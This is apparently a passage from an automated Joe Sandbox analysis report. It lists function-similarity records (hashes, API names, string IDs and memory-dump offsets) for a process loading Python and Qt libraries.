                                                                                                                                                                                                                                          • Instruction ID: 4b504fb0ac864fa36b9f7138d2a14674b337d13816460e6c27b9fb61ad9e29ee
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 52e45fd438f384f9dc00094440b7b9f97ab3eb64d2c4cf26df03f1e967ac2c2c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D21EB77608B4182EA208B16F84466977A4FB88FD8F544136EE8E07768EF3CE5558708
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Bool_FromLong
                                                                                                                                                                                                                                          • String ID: 1J9
                                                                                                                                                                                                                                          • API String ID: 2610644205-2407233842
                                                                                                                                                                                                                                          • Opcode ID: bc5a6e6772c1e054a57add0326500ee6cebf16673ffc56831d2715e2cc751d14
                                                                                                                                                                                                                                          • Instruction ID: 6e0a286b4bc88e7bebc1f55f9d8517f67b81d78d0ef766cd7e203671ce4a6d99
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bc5a6e6772c1e054a57add0326500ee6cebf16673ffc56831d2715e2cc751d14
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 99217C77A09B4682EA219B56E445178A3A4FF88FD8F088531DE8E13764EF3CF095C709
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DeallocRegion@@V0@@malloc
                                                                                                                                                                                                                                          • String ID: J9J9
                                                                                                                                                                                                                                          • API String ID: 2721989731-2881787613
                                                                                                                                                                                                                                          • Opcode ID: e9385aea60245421b889753081b914d4f15d5281564381813d9448da1f62e009
                                                                                                                                                                                                                                          • Instruction ID: f3c3e5af2121a86841d663edaf9e5f455b6bea9643988690ee3433ed87a24fcd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e9385aea60245421b889753081b914d4f15d5281564381813d9448da1f62e009
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A6215933B18A41C2EB508B16E84926973A5FB88FD0F554132EE9E47764EF3CE4518704
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _Py_Dealloc.PYTHON3 ref: 00007FF89D94BF21
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Deallocmalloc
                                                                                                                                                                                                                                          • String ID: EJ1
                                                                                                                                                                                                                                          • API String ID: 2267669106-3528995212
                                                                                                                                                                                                                                          • Opcode ID: 16066a3d3a1ebd6e2d9cb231d63343f9629f41f23f41c19fe99bcec400d2570a
                                                                                                                                                                                                                                          • Instruction ID: add153451efe93d59ce58b034397c514f6382e4d2ebbe576e3b6f61d65a2ad58
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 16066a3d3a1ebd6e2d9cb231d63343f9629f41f23f41c19fe99bcec400d2570a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7031E277A08B45C6EB609F16E88916973A0FB88FD0F904436EA9E43720EF7DE455CB14
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _Py_Dealloc.PYTHON3 ref: 00007FF89D9480F1
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Deallocmalloc
                                                                                                                                                                                                                                          • String ID: EJ1
                                                                                                                                                                                                                                          • API String ID: 2267669106-3528995212
                                                                                                                                                                                                                                          • Opcode ID: 9d1ab887e46e5824b0a8e4342537b010be69f3d347482e72bee3403fde8aad74
                                                                                                                                                                                                                                          • Instruction ID: 4015ca9e2be4e320a5e065a01237438612141e071dc80cfd5f8553016dde7ac0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9d1ab887e46e5824b0a8e4342537b010be69f3d347482e72bee3403fde8aad74
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2731E337A18B45C5EB609F16E88916973A4FB88FD0F804136DA9E83724EE7DE455C704
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Bool_FromLong
                                                                                                                                                                                                                                          • String ID: 1J9
                                                                                                                                                                                                                                          • API String ID: 2610644205-2407233842
                                                                                                                                                                                                                                          • Opcode ID: 3e0e32757434ec80e3b79828fe032dc9b677b45b792b156fa140777409428cee
                                                                                                                                                                                                                                          • Instruction ID: 14d9c839905310c62bc7a3581a41d9c43ed55fe0ca2dcbc50b4d2790e031d18c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e0e32757434ec80e3b79828fe032dc9b677b45b792b156fa140777409428cee
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A821FF77A09B81C2EA508B55F44526EA3A0FF84FE4F444532EE8E13B68EF3CE1558704
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Bool_FromLong
                                                                                                                                                                                                                                          • String ID: 1J9
                                                                                                                                                                                                                                          • API String ID: 2610644205-2407233842
                                                                                                                                                                                                                                          • Opcode ID: 0bd40943651bfcf23386b653e4a829f4714aad5142d183374797c4dbeade166f
                                                                                                                                                                                                                                          • Instruction ID: 5ecab4cac935cd7400890d2c22e83b7077ea269b9d85de2baa50d0ef15e64e66
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0bd40943651bfcf23386b653e4a829f4714aad5142d183374797c4dbeade166f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A21ED3AA09B81C2EA509B55F44426DA3A0FF95FD4F444535EE8E03B68EF3CE1558708
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ??0QString@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FF89D9CC01C
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: String@@V0@@malloc
                                                                                                                                                                                                                                          • String ID: QSyntaxHighlighter$highlightBlock
                                                                                                                                                                                                                                          • API String ID: 1360938472-1724829477
                                                                                                                                                                                                                                          • Opcode ID: 3c091128e6b523587925bcb7a584fd8045035d049bb998454d387b0c291e7010
                                                                                                                                                                                                                                          • Instruction ID: c06d5cc90df743ebfba04c2f4b8a1a3b591978a1d2093df2ff90775a32f44534
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3c091128e6b523587925bcb7a584fd8045035d049bb998454d387b0c291e7010
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 52114973A09B4586EB108B16E8406A973A5FB48FD4F480036EE8E17768EF3CF596C704
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • PyErr_SetString.PYTHON313(?,?,?,00007FF89ECA206C), ref: 00007FF89ECA4027
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89ECA21E0: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,00007FF89ECA20AF,?,?,?,00007FF89ECA206C), ref: 00007FF89ECA220A
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89ECA21E0: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,00007FF89ECA20AF,?,?,?,00007FF89ECA206C), ref: 00007FF89ECA2228
                                                                                                                                                                                                                                          • PyUnicode_FromOrdinal.PYTHON313(?,?,?,00007FF89ECA206C), ref: 00007FF89ECA20F5
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2747791894.00007FF89ECA1000.00000020.00000001.01000000.00000020.sdmp, Offset: 00007FF89ECA0000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89eca0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: strncmp$Err_FromOrdinalStringUnicode_
                                                                                                                                                                                                                                          • String ID: name too long
                                                                                                                                                                                                                                          • API String ID: 2523643974-297623866
                                                                                                                                                                                                                                          • Opcode ID: b1071a3647cdc4e7ae4666dfd80745f1f378677fa78539d24b9830cbf3fa62bb
                                                                                                                                                                                                                                          • Instruction ID: d646840d020033dcb7e1de19f2360d51d5bdbfe571ea9ac25d574bd479833205
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b1071a3647cdc4e7ae4666dfd80745f1f378677fa78539d24b9830cbf3fa62bb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3C116131B2864282EB74CB11E9C02796B62FB48FC8F541431EBAE43A94DF2CFC458710
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DoubleFloat_From
                                                                                                                                                                                                                                          • String ID: QVector3D$x(self) -> float
                                                                                                                                                                                                                                          • API String ID: 329246742-1354567454
                                                                                                                                                                                                                                          • Opcode ID: b164fee976c082549ce9376180b61b546f2038105489a99689e004863fd58a94
                                                                                                                                                                                                                                          • Instruction ID: 1f070ada628893a4e37d79066cfbfadd6d15d8ba719580f63da210252540e518
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b164fee976c082549ce9376180b61b546f2038105489a99689e004863fd58a94
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9C012136A04B4AD5DB10CF65D8496A933A4FB44FD4F918032CA9E07320EF7CE699C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DoubleFloat_From
                                                                                                                                                                                                                                          • String ID: QQuaternion$z(self) -> float
                                                                                                                                                                                                                                          • API String ID: 329246742-1128012678
                                                                                                                                                                                                                                          • Opcode ID: 99039d9004db0801bcfc5a1a37d3018496c2abebcca86cea28bae023adb2a50d
                                                                                                                                                                                                                                          • Instruction ID: 4b921fd2b5ac653d96fff9291a93c059140b0b32bea0284830757554f303133d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 99039d9004db0801bcfc5a1a37d3018496c2abebcca86cea28bae023adb2a50d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F2011E32A08B4AC1DB10DF61E8496A977A4FB54BD4F918132CA9E03320EF7DE559C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DoubleFloat_From
                                                                                                                                                                                                                                          • String ID: QVector2D$x(self) -> float
                                                                                                                                                                                                                                          • API String ID: 329246742-2271186758
                                                                                                                                                                                                                                          • Opcode ID: 2d2f080299449c0bfadf491cbc39ab9e6d5898c20bcf8bd3d3627ef2958e4810
                                                                                                                                                                                                                                          • Instruction ID: 37570b9c2e8712870df036562e9c83b37a333453161f03f2a10ce64f9e139a80
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2d2f080299449c0bfadf491cbc39ab9e6d5898c20bcf8bd3d3627ef2958e4810
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 24012136A08B46C5DB10DF65E8496A933A4FB44FD4F918032CA9E43320EF7CE699C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DoubleFloat_From
                                                                                                                                                                                                                                          • String ID: QVector4D$x(self) -> float
                                                                                                                                                                                                                                          • API String ID: 329246742-444826709
                                                                                                                                                                                                                                          • Opcode ID: d1a827893e5442eb33cb1219122b78be82d08ef09edb54bba468f41be848f23d
                                                                                                                                                                                                                                          • Instruction ID: 3801edd8f8d8433e083ff92f727068720e131ab602eda564867bc6fe6c2282af
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d1a827893e5442eb33cb1219122b78be82d08ef09edb54bba468f41be848f23d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 88011E36A04A46C5EB108F61E8496A933A4FB44BD4F914032CA9E07320EF7DE9A9C744